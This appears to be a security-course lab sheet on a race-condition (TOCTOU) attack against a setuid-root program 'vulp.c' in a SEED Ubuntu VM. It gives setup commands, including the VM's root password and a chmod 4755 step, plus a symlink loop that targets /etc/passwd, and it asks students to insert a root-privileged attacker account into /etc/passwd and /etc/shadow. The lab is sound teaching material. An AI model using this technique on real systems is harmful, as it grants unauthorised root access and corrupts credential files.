//---------------------------------------------//
  $ su root
  password: seedubuntu
//---------------------------------------------//
//********* Do the following as root **********//
//---------------------------------------------//
0. Backup file "/etc/shadow" and "/etc/passwd"
  $ cd /etc
  $ cp shadow shadow_bck
  $ cp passwd passwd_bck
                -----------------
1.1.  Rename "check.sh" to "check_shadow.sh".
1.2.  Make a copy of "check_shadow.sh" and change name to "check_passwd.sh".
1.3.  Open "check_passwd.sh" and replace "shadow" by "passwd".
1.4.  Add "touch attacking" at 2nd line and "rm attacking" at the last line of both "check_shadow.sh" and "check_passwd.sh".
1.5.  Give "check_shadow.sh" and "check_passwd.sh" execution permissions.
                -----------------
2.  Open your downloaded file "vulp.c" and include the following lines with "<---" in the inluded file "vulp.c". Or, you can use the included "vulp.c" directly.
                -----------------
3.  Compile the program
  $ gcc -o vulp vulp.c
  $ chown root:root vulp
  $ chmod 4755 vulp
  $ exit
//---------------------------------------------//
//********* Do the following as seed **********//
//---------------------------------------------//
4. Create a blank file named: "UserOwnerFile" in "/tmp" folder

The lab will consist of 3 components
   ----->>>------    -------->>>--------    -------->>>-------
   | "passwd"   |    |   ./vulp loop   |    |   Attack loop  |
   | loop (1)   |    |        (2)      |    |       (2)      |
   -----<<<------    --------<<<--------    --------<<<-------
+ "passwd" loop will check whether the current "passwd" file is changed or not
+ .vulp loop will repeatedly try to write the supplied string to the "file" /tmp/XYZ
+ Attack loop will repeatedly try to link and unlink /tmp/XYZ to /etc/passwd

Ideally, you should have 3 open terminals and running the following "code" for each terminal respectively.
  ** Note **  If you copy code of #6 and #7 and paste into the terminal, they will not work. Think about how to make them work.
 
                ---------Terminal #1: "passwd" loop --------
5. $ check_passwd.sh
                ---------Terminal #2: Attack loop --------
6. sudo while [-e attacking ] do
      ln -s /tmp/UserOwnerFile    /tmp/XYZ
      rm -f /tmp/XYZ
      ln -s  /etc/passwd            /tmp/XYZ
      rm -f /tmp/XYZ
  done
                ---------Terminal #3: ./vulp loop --------
7. while [-e attacking ] do
     ./vulp < input;
   done
-------
Tasks :
-------
1. Exploit the vulp.c program and use it to write to the /etc/passwd file the credential of an attacker with root privilege.
2. Exploit the vulp.c program and use it to write to the /etc/shadow file the credential of an attacker with root privilege.

Hint: Some trials might no be sucessuful at the first place. Try to increase DELAY to make this happen. What is the smallest value for DELAY that you can success?
